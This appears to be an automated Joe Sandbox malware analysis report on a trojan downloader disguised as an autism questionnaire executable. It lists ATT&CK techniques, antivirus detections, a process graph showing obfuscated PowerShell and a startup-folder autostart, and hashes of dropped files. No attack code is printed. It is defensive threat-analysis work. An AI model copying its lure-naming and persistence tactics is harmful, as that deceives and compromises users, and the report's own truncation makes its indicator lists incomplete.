            Valid AccountsCommand and Scripting Interpreter112Registry Run Keys / Startup Folder1Exploitation for Privilege Escalation1Masquerading11OS Credential DumpingSystem Time Discovery1Remote ServicesArchive Collected Data1Exfiltration Over Other Network MediumEncrypted Channel1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationSystem Shutdown/Reboot1
            Default AccountsNative API1Boot or Logon Initialization ScriptsAccess Token Manipulation1Virtualization/Sandbox Evasion21LSASS MemorySecurity Software Discovery1Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothJunk DataExploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
            Domain AccountsPowerShell2Logon Script (Windows)Process Injection12Access Token Manipulation1Security Account ManagerProcess Discovery1SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationSteganographyExploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
            Local AccountsAt (Windows)Logon Script (Mac)Registry Run Keys / Startup Folder1Process Injection12NTDSVirtualization/Sandbox Evasion21Distributed Component Object ModelInput CaptureScheduled TransferProtocol ImpersonationSIM Card SwapCarrier Billing Fraud
            Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptDeobfuscate/Decode Files or Information11LSA SecretsApplication Window Discovery11SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
            Replication Through Removable MediaLaunchdRc.commonRc.commonObfuscated Files or Information2Cached Domain CredentialsSystem Owner/User Discovery2VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
            External Remote ServicesScheduled TaskStartup ItemsStartup ItemsCompile After DeliveryDCSyncFile and Directory Discovery2Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
            Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobIndicator Removal from ToolsProc FilesystemSystem Information Discovery35Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue

            Behavior Graph

            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet
            behaviorgraph top1 signatures2 2 Behavior Graph ID: 538201 Sample: Girls-Questionnaire-For-Aut... Startdate: 11/12/2021 Architecture: WINDOWS Score: 100 78 Antivirus / Scanner detection for submitted sample 2->78 80 Icon mismatch, binary includes an icon from a different legit application in order to fool users 2->80 82 Multi AV Scanner detection for submitted file 2->82 84 6 other signatures 2->84 9 Girls-Questionnaire-For-Autism-Spectrum-Disorders.exe 2 2->9         started        process3 file4 68 Girls-Questionnair...ctrum-Disorders.tmp, PE32 9->68 dropped 90 Obfuscated command line found 9->90 13 Girls-Questionnaire-For-Autism-Spectrum-Disorders.tmp 6 23 9->13         started        signatures5 process6 file7 70 C:\Users\...\c27b72a3f30704afeffd331ab1557b93, ASCII 13->70 dropped 72 C:\Users\user\AppData\Local\...\_setup64.tmp, PE32+ 13->72 dropped 74 C:\Users\user\AppData\Local\...\_isdecmp.dll, PE32 13->74 dropped 92 Suspicious powershell command line found 13->92 94 Obfuscated command line found 13->94 17 powershell.exe 13->17         started        20 powershell.exe 18 13->20         started        23 powershell.exe 18 13->23         started        25 4 other processes 13->25 signatures8 process9 file10 50 C:\Users\user\...\VaRltDUbPMkAJw.kSNCiwQBaoM, DOS 17->50 dropped 52 C:\Users\...\UAnjRPwBSVcJvoyZOh.FOqQEDdkfmpu, DOS 17->52 dropped 54 C:\...\QzlyLWCNAPcGtTgHxr.qWXzuIgseixTtYcdarV, COM 17->54 dropped 66 92 other malicious files 17->66 dropped 27 conhost.exe 17->27         started        56 PowerShell_transcr....20211211144035.txt, UTF-8 20->56 dropped 86 Writes many files with high entropy 20->86 88 Powershell creates an autostart link 20->88 29 conhost.exe 20->29         started        58 PowerShell_transcr....20211211144037.txt, UTF-8 23->58 dropped 31 conhost.exe 23->31         started        60 PowerShell_transcr....20211211144038.txt, UTF-8 25->60 dropped 62 PowerShell_transcr....20211211144040.txt, UTF-8 25->62 dropped 64 PowerShell_transcr....20211211144038.txt, UTF-8 25->64 dropped 33 RdrCEF.exe 25->33         started        35 RdrCEF.exe 25->35         started        38 AcroRd32.exe 15 6 25->38         started        40 3 other processes 25->40 signatures11 process12 dnsIp13 42 RdrCEF.exe 33->42         started        44 RdrCEF.exe 33->44         started        46 RdrCEF.exe 33->46         started        48 2 other processes 33->48 76 192.168.2.1 unknown unknown 35->76 process14

            Screenshots

            Thumbnails

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.

            windows-stand

            Antivirus, Machine Learning and Genetic Malware Detection

            Initial Sample

            SourceDetectionScannerLabelLink
            Girls-Questionnaire-For-Autism-Spectrum-Disorders.exe36%VirustotalBrowse
            Girls-Questionnaire-For-Autism-Spectrum-Disorders.exe20%MetadefenderBrowse
            Girls-Questionnaire-For-Autism-Spectrum-Disorders.exe36%ReversingLabsWin32.Trojan.PsDownload
            Girls-Questionnaire-For-Autism-Spectrum-Disorders.exe100%AviraTR/Dldr.Agent.wqtsr

            Dropped Files

            SourceDetectionScannerLabelLink
            C:\Users\user\AppData\Local\Temp\is-DU1EI.tmp\_isetup\_isdecmp.dll0%VirustotalBrowse
            C:\Users\user\AppData\Local\Temp\is-DU1EI.tmp\_isetup\_isdecmp.dll0%MetadefenderBrowse
            C:\Users\user\AppData\Local\Temp\is-DU1EI.tmp\_isetup\_isdecmp.dll0%ReversingLabs
            C:\Users\user\AppData\Local\Temp\is-DU1EI.tmp\_isetup\_setup64.tmp0%VirustotalBrowse
            C:\Users\user\AppData\Local\Temp\is-DU1EI.tmp\_isetup\_setup64.tmp0%MetadefenderBrowse
            C:\Users\user\AppData\Local\Temp\is-DU1EI.tmp\_isetup\_setup64.tmp0%ReversingLabs
            C:\Users\user\AppData\Local\Temp\is-MNCMI.tmp\Girls-Questionnaire-For-Autism-Spectrum-Disorders.tmp0%MetadefenderBrowse
            C:\Users\user\AppData\Local\Temp\is-MNCMI.tmp\Girls-Questionnaire-For-Autism-Spectrum-Disorders.tmp9%ReversingLabs

            Unpacked PE Files

            No Antivirus matches

            Domains

            No Antivirus matches

            URLs

            SourceDetectionScannerLabelLink
            http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t0%URL Reputationsafe
            http://ocsp.sectigo.com00%URL Reputationsafe
            http://crl.microsoft0%URL Reputationsafe
            https://www.remobjects.com/ps0%URL Reputationsafe
            http://crl.microsof0%URL Reputationsafe
            http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#0%URL Reputationsafe
            http://subca.ocsp-certum.com010%URL Reputationsafe
            https://www.innosetup.com/0%URL Reputationsafe
            https://sectigo.com/CPS0D0%URL Reputationsafe
            https://jrsoftware.org00%Avira URL Cloudsafe
            http://cscasha2.ocsp-certum.com040%URL Reputationsafe

            Domains and IPs

            Contacted Domains

            No contacted domains info

            URLs from Memory and Binaries

            NameSourceMaliciousAntivirus DetectionReputation
            http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0tGirls-Questionnaire-For-Autism-Spectrum-Disorders.tmp, 00000003.00000003.327223650.0000000003712000.00000004.00000001.sdmp, Girls-Questionnaire-For-Autism-Spectrum-Disorders.tmp, 00000003.00000003.285499502.0000000003513000.00000004.00000001.sdmpfalse
            • URL Reputation: safe
            		unknown
            https://jrsoftware.org/ishelp/index.php?topic=setupcmdlineSetupUGirls-Questionnaire-For-Autism-Spectrum-Disorders.exefalse
              		high
              http://repository.certum.pl/ctnca.cer09Girls-Questionnaire-For-Autism-Spectrum-Disorders.tmp, 00000003.00000003.327223650.0000000003712000.00000004.00000001.sdmp, Girls-Questionnaire-For-Autism-Spectrum-Disorders.tmp, 00000003.00000003.285499502.0000000003513000.00000004.00000001.sdmpfalse
                		high
                http://repository.certum.pl/cscasha2.cer0Girls-Questionnaire-For-Autism-Spectrum-Disorders.tmp, 00000003.00000003.327223650.0000000003712000.00000004.00000001.sdmp, Girls-Questionnaire-For-Autism-Spectrum-Disorders.tmp, 00000003.00000003.285499502.0000000003513000.00000004.00000001.sdmpfalse
                  		high
                  http://ocsp.sectigo.com0Girls-Questionnaire-For-Autism-Spectrum-Disorders.tmp, 00000003.00000003.327223650.0000000003712000.00000004.00000001.sdmp, Girls-Questionnaire-For-Autism-Spectrum-Disorders.tmp, 00000003.00000003.285499502.0000000003513000.00000004.00000001.sdmpfalse
                  • URL Reputation: safe
                  		unknown
                  http://crl.certum.pl/ctnca.crl0kGirls-Questionnaire-For-Autism-Spectrum-Disorders.tmp, 00000003.00000003.327223650.0000000003712000.00000004.00000001.sdmp, Girls-Questionnaire-For-Autism-Spectrum-Disorders.tmp, 00000003.00000003.285499502.0000000003513000.00000004.00000001.sdmpfalse
                    		high
                    http://crl.microsoftpowershell.exe, 0000000C.00000003.453010711.0000000008ACF000.00000004.00000001.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    https://www.remobjects.com/psGirls-Questionnaire-For-Autism-Spectrum-Disorders.exe, 00000000.00000003.282256431.0000000002520000.00000004.00000001.sdmp, Girls-Questionnaire-For-Autism-Spectrum-Disorders.exe, 00000000.00000003.282523000.000000007FB50000.00000004.00000001.sdmp, Girls-Questionnaire-For-Autism-Spectrum-Disorders.tmp, Girls-Questionnaire-For-Autism-Spectrum-Disorders.tmp, 00000003.00000002.331497285.0000000000401000.00000020.00020000.sdmp, Girls-Questionnaire-For-Autism-Spectrum-Disorders.tmp.0.drfalse
                    • URL Reputation: safe
                    		unknown
                    http://crl.microsofpowershell.exe, 0000000C.00000003.397762259.0000000007388000.00000004.00000001.sdmp, powershell.exe, 0000000C.00000003.397657917.000000000736E000.00000004.00000001.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#Girls-Questionnaire-For-Autism-Spectrum-Disorders.tmp, 00000003.00000003.327223650.0000000003712000.00000004.00000001.sdmp, Girls-Questionnaire-For-Autism-Spectrum-Disorders.tmp, 00000003.00000003.285499502.0000000003513000.00000004.00000001.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    http://subca.ocsp-certum.com01Girls-Questionnaire-For-Autism-Spectrum-Disorders.tmp, 00000003.00000003.327223650.0000000003712000.00000004.00000001.sdmp, Girls-Questionnaire-For-Autism-Spectrum-Disorders.tmp, 00000003.00000003.285499502.0000000003513000.00000004.00000001.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    https://www.innosetup.com/Girls-Questionnaire-For-Autism-Spectrum-Disorders.exe, 00000000.00000003.282256431.0000000002520000.00000004.00000001.sdmp, Girls-Questionnaire-For-Autism-Spectrum-Disorders.exe, 00000000.00000003.282523000.000000007FB50000.00000004.00000001.sdmp, Girls-Questionnaire-For-Autism-Spectrum-Disorders.tmp, Girls-Questionnaire-For-Autism-Spectrum-Disorders.tmp, 00000003.00000002.331497285.0000000000401000.00000020.00020000.sdmp, Girls-Questionnaire-For-Autism-Spectrum-Disorders.tmp.0.drfalse
                    • URL Reputation: safe
                    		unknown
                    https://sectigo.com/CPS0DGirls-Questionnaire-For-Autism-Spectrum-Disorders.tmp, 00000003.00000003.327223650.0000000003712000.00000004.00000001.sdmp, Girls-Questionnaire-For-Autism-Spectrum-Disorders.tmp, 00000003.00000003.285499502.0000000003513000.00000004.00000001.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    https://jrsoftware.org0Girls-Questionnaire-For-Autism-Spectrum-Disorders.tmp, 00000003.00000003.327223650.0000000003712000.00000004.00000001.sdmp, Girls-Questionnaire-For-Autism-Spectrum-Disorders.tmp, 00000003.00000003.285499502.0000000003513000.00000004.00000001.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    https://jrsoftware.org/Girls-Questionnaire-For-Autism-Spectrum-Disorders.tmp, 00000003.00000003.327223650.0000000003712000.00000004.00000001.sdmp, Girls-Questionnaire-For-Autism-Spectrum-Disorders.tmp, 00000003.00000003.285499502.0000000003513000.00000004.00000001.sdmpfalse
                      		high
                      https://www.certum.pl/CPS0Girls-Questionnaire-For-Autism-Spectrum-Disorders.tmp, 00000003.00000003.327223650.0000000003712000.00000004.00000001.sdmp, Girls-Questionnaire-For-Autism-Spectrum-Disorders.tmp, 00000003.00000003.285499502.0000000003513000.00000004.00000001.sdmpfalse
                        		high
                        http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 0000000C.00000002.456870724.0000000004631000.00000004.00000001.sdmp, powershell.exe, 0000000E.00000002.452445471.0000000005301000.00000004.00000001.sdmpfalse
                          		high
                          http://crl.certum.pl/cscasha2.crl0qGirls-Questionnaire-For-Autism-Spectrum-Disorders.tmp, 00000003.00000003.327223650.0000000003712000.00000004.00000001.sdmp, Girls-Questionnaire-For-Autism-Spectrum-Disorders.tmp, 00000003.00000003.285499502.0000000003513000.00000004.00000001.sdmpfalse
                            		high
                            http://www.certum.pl/CPS0Girls-Questionnaire-For-Autism-Spectrum-Disorders.tmp, 00000003.00000003.327223650.0000000003712000.00000004.00000001.sdmp, Girls-Questionnaire-For-Autism-Spectrum-Disorders.tmp, 00000003.00000003.285499502.0000000003513000.00000004.00000001.sdmpfalse
                              		high
                              https://jrsoftware.org/ishelp/index.php?topic=setupcmdlineGirls-Questionnaire-For-Autism-Spectrum-Disorders.exefalse
                                		high
                                http://cscasha2.ocsp-certum.com04Girls-Questionnaire-For-Autism-Spectrum-Disorders.tmp, 00000003.00000003.327223650.0000000003712000.00000004.00000001.sdmp, Girls-Questionnaire-For-Autism-Spectrum-Disorders.tmp, 00000003.00000003.285499502.0000000003513000.00000004.00000001.sdmpfalse
                                • URL Reputation: safe
                                		unknown

                                Contacted IPs

                                • No. of IPs < 25%
                                • 25% < No. of IPs < 50%
                                • 50% < No. of IPs < 75%
                                • 75% < No. of IPs

                                Public

                                IPDomainCountryFlagASNASN NameMalicious

                                Private

                                IP
                                192.168.2.1

                                General Information

                                Joe Sandbox Version:34.0.0 Boulder Opal
                                Analysis ID:538201
                                Start date:11.12.2021
                                Start time:14:39:32
                                Joe Sandbox Product:CloudBasic
                                Overall analysis duration:0h 13m 2s
                                Hypervisor based Inspection enabled:false
                                Report type:full
                                Sample file name:Girls-Questionnaire-For-Autism-Spectrum-Disorders.exe
                                Cookbook file name:default.jbs
                                Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                Number of analysed new started processes analysed:39
                                Number of new started drivers analysed:0
                                Number of existing processes analysed:0
                                Number of existing drivers analysed:0
                                Number of injected processes analysed:0
                                Technologies:
                                • HCA enabled
                                • EGA enabled
                                • HDC enabled
                                • AMSI enabled
                                Analysis Mode:default
                                Analysis stop reason:Timeout
                                Detection:MAL
                                Classification:mal100.rans.evad.winEXE@39/179@0/1
                                EGA Information:
                                • Successful, ratio: 75%
                                HDC Information:
                                • Successful, ratio: 19.7% (good quality ratio 19.4%)
                                • Quality average: 77.1%
                                • Quality standard deviation: 23.1%
                                HCA Information:Failed
                                Cookbook Comments:
                                • Adjust boot time
                                • Enable AMSI
                                • Found application associated with file extension: .exe
                                Warnings:
                                Show All
                                • Exclude process from analysis (whitelisted): MpCmdRun.exe, BackgroundTransferHost.exe, WMIADAP.exe, SgrmBroker.exe, backgroundTaskHost.exe, conhost.exe, svchost.exe
                                • Excluded IPs from analysis (whitelisted): 92.122.146.26, 80.67.82.97, 80.67.82.80, 20.54.110.249
                                • Excluded domains from analysis (whitelisted): e4578.dscb.akamaiedge.net, acroipm2.adobe.com.edgesuite.net, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, neu-displaycatalogrp.frontdoor.bigcatalog.commerce.microsoft.com, arc.msn.com, acroipm2.adobe.com, ssl.adobe.com.edgekey.net, armmf.adobe.com, consumer-displaycatalogrp-aks2aks-europe.md.mp.microsoft.com.akadns.net, a122.dscd.akamai.net, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net
                                • Execution Graph export aborted for target powershell.exe, PID 5972 because it is empty
                                • Not all processes where analyzed, report is missing behavior information
                                • Report size exceeded maximum capacity and may have missing behavior information.
                                • Report size getting too big, too many NtOpenKeyEx calls found.
                                • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                • Report size getting too big, too many NtQueryValueKey calls found.
                                • Report size getting too big, too many NtSetInformationFile calls found.

                                Simulations

                                Behavior and APIs

                                TimeTypeDescription
                                14:40:39API Interceptor186x Sleep call for process: powershell.exe modified
                                14:40:50API Interceptor12x Sleep call for process: RdrCEF.exe modified
                                14:42:55AutostartRun: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a65a7aeb5fe4978dc705b96d177e7.LNK

                                Joe Sandbox View / Context

                                IPs

                                No context

                                Domains

                                No context

                                ASN

                                No context

                                JA3 Fingerprints

                                No context

                                Dropped Files

                                MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                C:\Users\user\AppData\Local\Temp\is-DU1EI.tmp\_isetup\_setup64.tmpBF1.exeGet hashmaliciousBrowse
                                  AIlUgor6h7.exeGet hashmaliciousBrowse
                                    7S6KBG5w7W.exeGet hashmaliciousBrowse
                                      4r4WFkpvvq.exeGet hashmaliciousBrowse
                                        21ABA879CA90E3D4B3B58F61316B6B42C97D31F62DEA2.exeGet hashmaliciousBrowse
                                          5Yi7XQkHUQ.exeGet hashmaliciousBrowse
                                            991D4DC612FF80AB2506510DBA31531DB995FE3F64318.exeGet hashmaliciousBrowse
                                              67MPsax8fd.exeGet hashmaliciousBrowse
                                                B10274561191CEDB0B16D2A69FDCD4E5062EDFE262184.exeGet hashmaliciousBrowse
                                                  2HFJezUWHA.exeGet hashmaliciousBrowse
                                                    OabbZE2zf1.exeGet hashmaliciousBrowse
                                                      MiNj1lDY5T.exeGet hashmaliciousBrowse
                                                        1Edyk9e6oL.exeGet hashmaliciousBrowse
                                                          caYfUkPlTx.exeGet hashmaliciousBrowse
                                                            8CY6nr1mmt.exeGet hashmaliciousBrowse
                                                              OGzuPn8ahY.exeGet hashmaliciousBrowse
                                                                OPKyR75fJn.exeGet hashmaliciousBrowse
                                                                  mapcmapc-registratio_39379648.exeGet hashmaliciousBrowse
                                                                    0331C7BCA665F36513377FC301CBB32822FF35F925115.exeGet hashmaliciousBrowse
                                                                      42E07EA0F43BEC6913D6AC78FF74536695AE273CD28DB.exeGet hashmaliciousBrowse
                                                                        C:\Users\user\AppData\Local\Temp\is-DU1EI.tmp\_isetup\_isdecmp.dll6rfyiAq0nM.msiGet hashmaliciousBrowse
                                                                          ListSvc.exeGet hashmaliciousBrowse
                                                                            Freddie-Mac-Warrantable-Condo-List.exeGet hashmaliciousBrowse
                                                                              iumk21HlC8.exeGet hashmaliciousBrowse
                                                                                FxWNeUN38R.exeGet hashmaliciousBrowse
                                                                                  7CiwBIK7nr.exeGet hashmaliciousBrowse
                                                                                    978B4AC05A227B23EF7E4FADFF92966339BA1413BAC5A.exeGet hashmaliciousBrowse
                                                                                      Declaration-Of-Independence-Crossword-Puzzle-Answers-Quizlet.exeGet hashmaliciousBrowse
                                                                                        How-To-Get-A-Statement-From-Netspend.exeGet hashmaliciousBrowse
                                                                                          gj13C7atN2.exeGet hashmaliciousBrowse

                                                                                            Created / dropped Files

                                                                                            C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\05349744be1ad4ad_0
                                                                                            Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):205
                                                                                            Entropy (8bit):5.643412364247602
                                                                                            Encrypted:false
                                                                                            SSDEEP:3:m+lvns8RzYOCGLvHkWBGKuKjXKLNjKLuVL172EvB9koMkt6/t/iTFJrqzOJkvP5y:men9YOFLvEWdM9Q21n9katii7Z+P41
                                                                                            MD5:16C8ACA88FB8879A1D8032F86C5897BD
                                                                                            SHA1:4C4D8E8E1D615D5B1FA3E59BD608AA94818EAA2D
                                                                                            SHA-256:A2D712DB6523CC35C883746D57A1D7AADC6A873091A57B48784908B87AD463EF
                                                                                            SHA-512:7CB9B9C914FAC252074D7F7B55BAB552028887F5BAAE01D0FEDBEAE578E21D7B475F34D58F526AB367E83F8804A559BC0AE87F0FC29F1FC288BCCA17E339CAF4
                                                                                            Malicious:false
                                                                                            Preview: 0\r..m......M..........._keyhttps://rna-resource.acrobat.com/static/js/plugins/reviews/js/plugin.js .'~..|1/....."#.D.SXCJm.A.A..Eo........c.............d.{v.^.G...d.W.:...P..k%..A..Eo..................
                                                                                            C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\0786087c3c360803_0
                                                                                            Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):174
                                                                                            Entropy (8bit):5.557681201069607
                                                                                            Encrypted:false
                                                                                            SSDEEP:3:m+lF9NX6v8RzYOCGLvHktWVyERat/lYFMktq39lXe98fZe/O+/rkwGhkg4m1:mi9NqEYOFLvEkYtWtMHa8Be7Ywcr1
                                                                                            MD5:F295E446FADB389504A9859E467874F6
                                                                                            SHA1:A0A7D197785A11AB38C1FDA1EE792653F9144D5C
                                                                                            SHA-256:050833C7B2C0582850BE7B2D2A19E6283ADB5898713630845E8B9F605B48B728
                                                                                            SHA-512:78F1EE85D76FBD5C28669C8614268DFCCCFC38F4D32F1825DA432C61805C9BAD4CE7AF882AE2C75FD662363DCF2335BBC918A213EDCC99325F6D685D9EF9FF0F
                                                                                            Malicious:false
                                                                                            Preview: 0\r..m............,....._keyhttps://rna-resource.acrobat.com/init.js .W...|1/....."#.D...>Jm.A.A..Eo......).(..........1.x.'.vI..*|Z..o...+.4....0..A..Eo..................
                                                                                            C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\0998db3a32ab3f41_0
                                                                                            Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):246
                                                                                            Entropy (8bit):5.574227650269549
                                                                                            Encrypted:false
                                                                                            SSDEEP:6:mMyEYOFLvEWdVFLBKFjVFLBKFlQhuLe/fQfatdt/RlUoSjGY1:DyeRVFAFjVFAFX+f33tZlUo6
                                                                                            MD5:3F6543D02E6C6D1B81B7502B5F8F9C12
                                                                                            SHA1:BB0E857F6CAA6BA89574922DEA2D918FB4F9A829
                                                                                            SHA-256:AFB5D87367F69905C04E2EB67F2C7C2C8978E3E6C9BDCA4FF718F3310AE3FA9E
                                                                                            SHA-512:A0E9C5A8939EE738F5F8128FA4882884671D1652461736103AAB2047413F622C6C40D8FAE7C895DAE78254460E9A35C4C1BD5C5CC7329541A8BB782F0B41852E
                                                                                            Malicious:false
                                                                                            Preview: 0\r..m......v...n......._keyhttps://rna-resource.acrobat.com/static/js/plugins/tracked-send/js/plugins/tracked-send/js/home-view/selector.js .....|1/....."#.DK..BJm.A.A..Eo......q`............hvDO.N.t@.....n.*...... ....A..Eo..................
                                                                                            C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\0ace9ee3d914a5c0_0
                                                                                            Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):232
                                                                                            Entropy (8bit):5.650019318499737
                                                                                            Encrypted:false
                                                                                            SSDEEP:6:mNtVYOFLvEWdFCi5RsJJ/UodatCuiWulHyA1:IbRkiDs/nagjWus
                                                                                            MD5:FD17C3E17B552CDA4E781859676EC65E
                                                                                            SHA1:A20015B9C72D656564585A8A0E2933DDCE508B28
                                                                                            SHA-256:62C0B7D62A42EC842E8985030E9162CE11A9981628D66E56D302F460C98826BD
                                                                                            SHA-512:D5C24767197AA6D9F166BDDDBA3CB16F257EFA197719FCBC05CEDF56D760217A7D515DD20A308BEB74D486D71EB803A79A5A01AEDD1A7376160378657651A932
                                                                                            Malicious:false
                                                                                            Preview: 0\r..m......h.....'....._keyhttps://rna-resource.acrobat.com/static/js/plugins/aicuc/js/plugins/rhp/exportpdf-rna-tool-view.js ...?.|1/....."#.D..CJm.A.A..Eo......A.f..........8 P..a...R..Y....7.@..2Dm{..A..Eo..................
                                                                                            C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\0f25049d69125b1e_0
                                                                                            Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):210
                                                                                            Entropy (8bit):5.5557033501491
                                                                                            Encrypted:false
                                                                                            SSDEEP:6:m+yiXYOFLvEWd7VIGXVuPuYatLfl2Vyh9PT41:pyixRuRFaBUV41T
                                                                                            MD5:5FB58487A9EDE05A2FA49AA88A4C719A
                                                                                            SHA1:D70D8A2B97D484E8EAFF95CFA1BBE7CE750A1F47
                                                                                            SHA-256:11675DC49FD9667F1DE2A5E64EA5560439811615DC0500D716189BCC13E87FB7
                                                                                            SHA-512:D1A7873A78248EB5EBB535E2A174EFEDB85C74C750E547847F70CADEAA64314A50FAEB5DFF2CE1BF85E141387E612C01D6A162ADB1D305D276EC0C2EEE22FF5B
                                                                                            Malicious:false
                                                                                            Preview: 0\r..m......R...kP]g...._keyhttps://rna-resource.acrobat.com/static/js/plugins/app-center/js/selector.js .....|1/....."#.D.=.CJm.A.A..Eo.........E........k.Q.....-_..y.....O...>..1....A..Eo..................
                                                                                            C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\230e5fe3e6f82b2c_0
                                                                                            Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):216
                                                                                            Entropy (8bit):5.612388645423502
                                                                                            Encrypted:false
                                                                                            SSDEEP:3:m+lifll08RzYOCGLvHkWBGKuKjXKoyNjXKLuV4BEEmvIqkoMktNH/l3lYo2sZI8e:mvYOFLvEWdhwjQfBEwat93ZIl6P41
                                                                                            MD5:128FE472E44D15E2E8A40B1AF140A68B
                                                                                            SHA1:75DE9409C99A76DD08231B1D083D715A3B597834
                                                                                            SHA-256:6BF9AB7874CF44FD7DF8E7EA8FC53FB5DBFBD0C4E2B7B88073C4430F0887D431
                                                                                            SHA-512:E1F9319FD3F144CC2D8AEF4271C83FA12A57C08BA87E4D8E2B883380A45E99032C8689C5E8228D704A49F90E9C822C13B12603D2DC55448992F49461AC70CD68
                                                                                            Malicious:false
                                                                                            Preview: 0\r..m......X.....V....._keyhttps://rna-resource.acrobat.com/static/js/plugins/sign-services-auth/js/plugin.js .7...|1/....."#.D.LCBJm.A.A..Eo......$h.>.........].>....uUf..N...k......c..l.A..Eo..................
                                                                                            C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\2798067b152b83c7_0
                                                                                            Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):209
                                                                                            Entropy (8bit):5.508844885607995
                                                                                            Encrypted:false
                                                                                            SSDEEP:3:m+lZd8RzYOCGLvHkWBGKuKjXKX7KoQRA/KVdKLuVtSgUKlXFQoMktu1VcyxMtv9G:mJYOFLvEWdGQRQOdQBReKatubD6g1
                                                                                            MD5:6499473017F20F3A9154ADDA6ABBAC9D
                                                                                            SHA1:13E8E0A50511340A0FD4224B096E601CD38B8B89
                                                                                            SHA-256:B92F7AA68425B15A44C96512E3B0F0D11102F5F2BD2545CF48793EB26CC5F67C
                                                                                            SHA-512:83F29B153574692A2C38E4DC0710F4F61C94878D6C5396EB1D99894986BA4A4FB867C67804E7D1B9D09F4A7E70D6B1D6C264A3D4B9F2C4C95F6F448CA7ED4A76
                                                                                            Malicious:false
                                                                                            Preview: 0\r..m......Q..........._keyhttps://rna-resource.acrobat.com/static/js/plugins/my-computer/js/plugin.js .kg..|1/....."#.DS..BJm.A.A..Eo...................c..y/L....|y.n..C/I.....X7-ne.A..Eo..................
                                                                                            C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\2a426f11fd8ebe18_0
                                                                                            Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):179
                                                                                            Entropy (8bit):5.472029893394346
                                                                                            Encrypted:false
                                                                                            SSDEEP:3:m+lLp08RzYOCGLvHkfaMMuVJqKlltAW/9qMkttlDQMWqg4nRb7om5m1:mOYOFLvECMLj1z/9Qtt2uR/41
                                                                                            MD5:99735BC3A1A0DE313BBA0C9A16C5D90B
                                                                                            SHA1:E6797B424142C5D1D859A7109D578751AC39360F
                                                                                            SHA-256:142A517D6CFD71A71F2864C15CCC99474A03E4D7F30CA2E72E0EC5E59E92F0EC
